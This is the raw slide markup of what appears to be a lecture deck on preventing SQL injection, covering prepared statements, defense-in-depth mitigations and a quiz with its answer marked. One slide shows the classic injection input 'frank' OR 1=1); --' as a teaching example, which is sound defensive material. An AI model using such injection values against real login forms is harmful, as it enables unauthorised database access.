            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="651" name="Shape 651"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3820305" y="531717"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="519937">
              <a:defRPr sz="9968"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Using prepared statements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="652" name="Shape 652"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1570071" y="2509097"/>
            <a:ext cx="21061680" cy="1498486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>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p>
            <a:pPr algn="l">
              <a:defRPr sz="4400">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db.execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("SELECT * FROM Users WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4400">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>             Name = ? AND Password = ?", [user, pass])</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="653" name="Shape 653"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4441723" y="5294960"/>
            <a:ext cx="7183130" cy="1226904"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15527"/>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dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WHERE</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="654" name="Shape 654"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4369904" y="7230899"/>
            <a:ext cx="1736001"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t>*</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655" name="Shape 655"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6516396" y="7230899"/>
            <a:ext cx="2494973"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dirty="0"/>
              <a:t>Users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="656" name="Shape 656"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10853425" y="7230899"/>
            <a:ext cx="2494973" cy="1226904"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15527"/>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dirty="0"/>
              <a:t>AND</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="657" name="Shape 657"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8752325" y="9166839"/>
            <a:ext cx="1239044" cy="1226904"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15527"/>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t>=</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="658" name="Shape 658"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6971222" y="11102778"/>
            <a:ext cx="2124133" cy="1226905"/>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dirty="0"/>
              <a:t>Name</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="659" name="Shape 659"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9665501" y="11102778"/>
            <a:ext cx="2324138" cy="1226905"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15527"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="660" name="Shape 660"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14430874" y="9166839"/>
            <a:ext cx="1239044" cy="1226904"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15527"/>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t>=</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="661" name="Shape 661"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12481121" y="11079869"/>
            <a:ext cx="2998043" cy="1226904"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15527"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent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200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662" name="Shape 662"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15612355" y="11079869"/>
            <a:ext cx="2324138" cy="1226904"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 15527"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="663" name="Shape 663"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14430874" y="4768477"/>
            <a:ext cx="8473343" cy="2452593"/>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p>
            <a:pPr algn="l">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Binding is only applied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>to the leaves, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>leaving</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>structure of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AST </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ntact</a:t>
            </a:r>
            <a:endParaRPr i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="666" name="Group 666"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9665501" y="11079869"/>
            <a:ext cx="8270993" cy="1249814"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8270992" cy="1249812"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="664" name="Shape 664"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="22909"/>
              <a:ext cx="2324138" cy="1226904"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 15527"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solid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4200">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0"/>
                <a:t>user</a:t>
              </a:r>
              <a:endParaRPr i="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="665" name="Shape 665"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5946854" y="0"/>
              <a:ext cx="2324139" cy="1226904"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 15527"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solid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4200">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr i="1" dirty="0"/>
                <a:t>pass</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="667" name="Shape 667"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9348347" y="11077159"/>
            <a:ext cx="2881431" cy="1984376"/>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3900" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>frank’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3900" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>OR 1=1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3900" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t> -- </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>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2507974249"/>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666"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>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652"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="65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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="663"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="663"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="663"/>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9" presetClass="entr" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="667"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="20"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 grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="663" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="666" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="667"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Also: Mitigation"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Also: Mitigation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="For defense in depth, you might also attempt to mitigate the effects of an attack…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>defense in depth</a:t>
            </a:r>
            <a:r>
              <a:t>, you might </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:t> attempt to mitigate the effects of an attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>But should </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>always do input validation</a:t>
            </a:r>
            <a:r>
              <a:t> in any case!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Limit privileges</a:t>
            </a:r>
            <a:r>
              <a:t>; reduces power of exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Can limit commands and/or tables a user can access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:t>Allow SELECT queries on Orders_Table but not on Creditcards_Table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Encrypt sensitive data</a:t>
            </a:r>
            <a:r>
              <a:t> stored in the database; less useful if stolen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>May not need to encrypt Orders_Table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>But certainly encrypt Creditcards_Table.cc_numbers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">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3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3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3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43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4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4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4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build="p"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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="3134320"/>
            <a:ext cx="18481082" cy="9336129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5800" dirty="0"/>
              <a:t>What is the benefit of using “prepared statements” ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5800" dirty="0">
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1992119" y="5668812"/>
            <a:ext cx="20876416" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" indent="-914400" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With them it is easier to construct a SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They ensure user input is parsed as data, not (potentially) code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They provide greater protection than escaping or filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User input is properly treated as commands, rather than as secret data like passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2663487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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="3134320"/>
            <a:ext cx="18004428" cy="9336129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5800" dirty="0"/>
              <a:t>What is the benefit of using “prepared statements” ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5800" dirty="0">
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1992119" y="5668812"/>
            <a:ext cx="20876416" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" indent="-914400" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With them it is easier to construct a SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They ensure user input is parsed as data, not code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They provide greater protection than escaping or filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User input is properly treated as commands, rather than as secret data like passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363301086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7CCB2-5882-9A3A-B5A7-D864513A87E2}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
